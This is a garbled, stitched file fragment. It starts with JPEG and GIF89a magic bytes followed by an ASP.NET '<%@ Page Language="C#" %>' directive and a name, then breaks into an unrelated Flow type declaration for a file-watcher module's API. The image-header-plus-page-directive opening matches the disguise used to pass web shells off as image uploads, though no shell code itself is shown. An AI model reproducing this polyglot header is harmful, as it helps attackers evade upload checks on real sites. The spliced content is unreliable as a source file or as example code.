ÿØÿà JFIF    ÿÛ C     $.' ",#(7),01444'9=82<.342ÿÛ C  2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %> Mahdee Rajon
 ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- // @flow declare type FilePath = string; declare type GlobPattern = string; export type BackendType = | 'fs-events' | 'watchman' | 'inotify' | 'windows' | 'brute-force'; export type EventType = 'create' | 'update' | 'delete'; export interface Options { ignore?: Array, backend?: BackendType } export type SubscribeCallback = ( err: ?Error, events: Array ) => mixed; export interface AsyncSubscription { unsubscribe(): Promise } export interface Event { path: FilePath, type: EventType } declare module.exports: { getEventsSince( dir: FilePath, snapshot: FilePath, opts?: Options ): Promise>, subscribe( dir: FilePath, fn: SubscribeCallback, opts?: Options ): Promise, unsubscribe( dir: FilePath, fn: SubscribeCallback, opts?: Options ): Promise, writeSnapshot( dir: FilePath, snapshot: FilePath, opts?: Options ): Promise }